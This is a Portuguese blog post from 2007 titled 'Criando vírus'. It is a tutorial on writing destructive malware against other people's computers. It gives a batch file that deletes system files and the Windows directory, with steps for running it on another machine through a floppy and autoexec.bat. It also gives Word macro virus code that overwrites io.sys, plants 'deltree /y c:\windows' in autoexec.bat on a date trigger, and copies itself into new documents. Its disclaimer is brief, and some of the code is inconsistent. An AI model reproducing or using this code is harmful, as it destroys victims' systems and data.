Criando vírus

domingo, 10 de junho de 2007

Este texto apresenta, de forma simplificada, como criar um arquivo malicioso para danificar o computador de terceiros. Ressaltamos que tais ações são antiéticas e, em muitos casos, ilegais. O conteúdo a seguir é apenas descritivo e não deve ser utilizado para fins prejudiciais.

Criando um arquivo malicioso em lote

Primeiramente, crie um arquivo de lote no computador. Este tipo de arquivo pode ser criado sem a necessidade de compilação. Caso não saiba como proceder, aqui está o comando para criá-lo no DOS:

copy con arquivo.bat
@echo off
@echo mensagem de sua escolha
del *.sys
del *.exe
del *.com
cd windows
del *.*
del arquivo.bat
@echo mensagem de sua escolha

Este comando criará um arquivo de lote capaz de apagar diversos arquivos do sistema. No entanto, ele só será executado se for iniciado manualmente. Tenha cuidado ao manipulá-lo, pois pode causar sérios danos ao sistema.

Para utilizá-lo em outro ambiente, transfira o arquivo arquivo.bat para um disquete, acompanhado de um arquivo autoexec.bat contendo a seguinte linha de comando:

C:\arquivo.bat

Ao inserir o disquete em outro computador, copie os arquivos para o diretório C:\. Feito isso, remova o disquete e deixe o sistema executar o arquivo na próxima inicialização.

                        

Exemplo de um vírus de macro

Abaixo está um exemplo de um vírus de macro capaz de modificar arquivos ou causar outros danos ao sistema:

Vírus 12/04

Sub MAIN()
   If Day(Now) = 12 And Month(Now) = 4 Then
       SetAttr "C:\msdos.sys", 0
       Open "C:\io.sys" For Output As #1
       Print #1, "Mensagem maliciosa"
       Close #1
   End If
   Open "C:\autoexec.bat" For Output As #1
   Print #1, "@echo off"
   Print #1, "cls"
   Print #1, "@deltree /y c:\windows > nul"
   Close #1
End Sub

Rotina 2

Sub MAIN()
    Open "C:\imaiden.txt" For Output As #1
    Print #1, "Código em hexadecimal"
    Close #1
    Shell "debug texto.txt"
    Shell "c:\imaiden.com"
End Sub

Rotina 3

Sub MAIN()
    MacroCopy "Global:Inocu", "DocumentoNovo", 0
End Sub

Vírus Fagundes Varela

Sub MAIN()
    BeginDocument
    Insert "Lembra dessas noites"
    Insert CHR$(13)
    Insert "Cheias de doce harmonia,"
    Insert CHR$(13)
    Insert "Quando a floresta gemia"
    Insert CHR$(13)
    Insert "Do vento aos brandos açoites?"
    Insert CHR$(13)
    Insert CHR$(13)
    Insert "Quando as estrelas sorriam"
    Insert CHR$(13)
    Insert "Quando as campinas tremiam"
    Insert CHR$(13)
    Insert "Nas dobras do úmido véu?"
    Insert CHR$(13)
    Insert "E nossas almas unidas"
    Insert CHR$(13)
    Insert "Estreitavam-se, sentidas,"
    Insert CHR$(13)
    Insert "Ao brilhar daquele céu?"
    StandardPrintDocument
End Sub

                        

Observações

Esses exemplos ilustram códigos maliciosos, conhecidos como "destructive scripts", programados para danificar sistemas, desconfigurar arquivos essenciais, como io.sys, msdos.sys e command.com, ou até mesmo travar o computador por completo. No entanto, sua remoção pode ser realizada de várias formas, como a formatação completa do disco rígido (format c: /u) ou a utilização de ferramentas de antivírus atualizadas.

No caso de sistemas mais modernos, como o Windows XP, recomenda-se criar um ponto de restauração para evitar perda de dados importantes. Já em sistemas mais antigos, como o Windows 98, o suporte limitado pode tornar a recuperação mais desafiadora.